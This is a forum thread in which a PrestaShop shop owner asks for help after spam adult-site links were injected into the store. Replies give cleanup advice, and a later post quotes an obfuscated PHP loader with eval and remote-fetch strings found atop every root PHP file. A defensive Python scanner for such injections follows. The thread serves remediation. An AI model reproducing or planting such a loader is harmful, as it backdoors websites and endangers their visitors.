
Help me - My store was infected !?


sawyer_sp


I've been checking the code for my site and noticed some strange URLs such as http://www.deuporno.com, http://www.pornluz.com, etc. My site was infected; is it some sort of trojan? These links appear on the main page as well as in some of our products. Who wants to help me?

 

Thankful now

Edited by sawyer_sp (see edit history)

The best way I ever found of getting rid of the infection is to download the site and let my PC antivirus detect it. Then I would replace those files with clean ones.

Just don't download into your backed-up site, assuming you have one.

Also, first and most importantly, change your FTP password and get rid of any unused FTP users.


It's important to always use up-to-date antivirus software. And remember to always download PrestaShop from the official website / official GitHub page.

In this case you can only delete the links manually, or re-upload new, unchanged files to the FTP server.


It took me 15 days to clean my sites. elpatron is right. Download your site to a secure directory on your computer. Scan the folder with an antivirus. All the files that come up infected, replace them with clean ones. Both PrestaShop and template files.

But before you upload your site, assuming it is clean, do this: download the Sublime Text editor and search in ALL your files for these sites. For example, your URL was ***porno.co*. (I won't write it in full.) Go search your files for these URLs.

There is a 99% chance that you will find more files with hidden iframes etc. Replace them too. Change the FTP password and upload.

It will take 48 hours to see if it is OK or if it will be hacked again. (That's what happened to me.)

 

Good luck.


  • 3 weeks later...

Every PHP file in my PrestaShop root folder has this strange PHP snippet on top:

<?php /*versio:2.11*/$QQQOQ=0;$GLOBALS['Q00Q'] = '2Y3VybA@7X2luaXQ}4YWxsb3dfdXJsX2ZvcGVu7$2MQ()X3NldG9wdA*;X2V4ZWM{;XwceY2xvc2U05*@#PGltZyBzcmM9Ig@c0IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz401}dw11_b3Nvbi5pbg*)a3RpcHAuY2g*c2lsYmVyLmRl%9aWV8)f0Og{ZGlzcGxheV9lcnJvcnMeZGV0ZXJtaW5hdG9y((5ZnRw2_0.%Mi4xMQ3SWtjMnhUdjVBeTB3M2Q^,YmFzZTY0X2VuY29kZQ8YmFzZTY0X2RlY29kZQd0$aHR0cDovLw.,6SFRUUF9IT1NU*6&SFRUUF9VU0VSX0FHRU5U..1dW5pb244c2VsZWN0feUkVRVUVTVF9VUkk413U0NSSVBUX05BTUU4._UVVFUllfU1RSSU5HPw$}0d00L3RtcC8!$5L3RtcA.2VE1QVEVNUAcc,VE1QRElSdXBsb2FkX3RtcF9kaXI!e9.0{Lg1)3b!dmVyc2lvLQ(8LXBocA%^SFRUUF9FWEVDUEhQb3V0b2saHR0cA4*6Oi8vb.(L3BnLnBocD91PQd)Jms9*JnQ9cGhwJnA9JnY96261736536345f6465636f6465';$QQQOQ=pack('H*',substr($GLOBALS['Q00Q'], -26));if (!function_exists('Q000OQQ0')){function Q000OQQ0($QO, $Q0){$c=$GLOBALS['Q00Q']; $d=pack('H*',substr($GLOBALS['Q00Q'], -26));

return $d(substr($c, $QO, $Q0));[spam-filter];

eval($QQQOQ('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'));?>

and the AddToCart function takes around 10 seconds to reload the whole page.

Has anybody seen this problem before or have any idea?

Please help.

Edited by leemyongpakvn (see edit history)
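One way to automate the search the posts above describe (the spam URLs, hidden iframes, and an obfuscated header at the top of PHP files), run against a downloaded copy of the shop. This is an added example, not code from any poster: the patterns, the extension list and the `spam.example` domain are assumptions, and the sample files are constructed and inert.

```python
import re
import tempfile
from pathlib import Path

TEXT_EXT = {".php", ".tpl", ".html", ".htm", ".js"}  # assumed list, extend as needed
# Heuristic: an <iframe> sized to 0 or 1 px, or hidden through CSS.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:(?:width|height)\s*=\s*[\"']?[01](?:px)?[\"'\s>]"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I)
# Heuristic: loader at the top of a PHP file shaped like the one quoted in the
# thread: a $GLOBALS string blob, pack('H*', ...) and eval( all near the start.
LOADER_PARTS = (re.compile(r"\$GLOBALS\s*\["),
                re.compile(r"pack\s*\(\s*['\"]H\*"),
                re.compile(r"\beval\s*\("))

def scan_file(path, domains):
    """Return the list of reasons this file looks tampered with."""
    text = path.read_text(encoding="utf-8", errors="replace")
    lowered = text.lower()
    reasons = [f"url:{d}" for d in domains if d.lower() in lowered]
    if HIDDEN_IFRAME.search(text):
        reasons.append("hidden-iframe")
    head = text[:4096]  # injected headers sit at the very top of the file
    if path.suffix.lower() == ".php" and all(p.search(head) for p in LOADER_PARTS):
        reasons.append("obfuscated-php-header")
    return reasons

def scan_tree(root, domains):
    """Map relative path -> reasons for every flagged file under root."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in TEXT_EXT:
            reasons = scan_file(path, domains)
            if reasons:
                hits[path.relative_to(root).as_posix()] = reasons
    return hits

def demo():
    # Constructed, inert files standing in for a downloaded shop copy.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "themes").mkdir()
        (root / "index.php").write_text(
            "<?php /*v*/$GLOBALS['Q']='00';$f=pack('H*','00');eval($f(''));?>\n<?php echo 1;")
        (root / "themes" / "footer.tpl").write_text(
            '<iframe src="http://spam.example/x" width="1" height="1"></iframe>')
        (root / "init.php").write_text("<?php require 'config.php';")
        return scan_tree(root, ["spam.example"])

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, ", ".join(reasons))
```

Flagged files are candidates for replacement with clean originals; a file that is not flagged is not proven clean, since these are only pattern matches.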
